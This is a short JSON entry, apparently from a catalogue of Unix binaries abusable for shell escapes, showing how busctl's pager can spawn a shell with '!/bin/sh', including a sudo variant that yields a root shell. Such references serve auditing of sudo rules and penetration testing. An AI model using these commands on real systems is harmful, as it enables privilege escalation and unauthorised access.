{ "description": "This invokes the default pager, which is likely to be 'less', other functions may apply.", "functions": { "shell": [ { "code": "busctl --show-machine\n!/bin/sh\n" } ], "sudo": [ { "code": "sudo busctl --show-machine\n!/bin/sh\n" } ] } }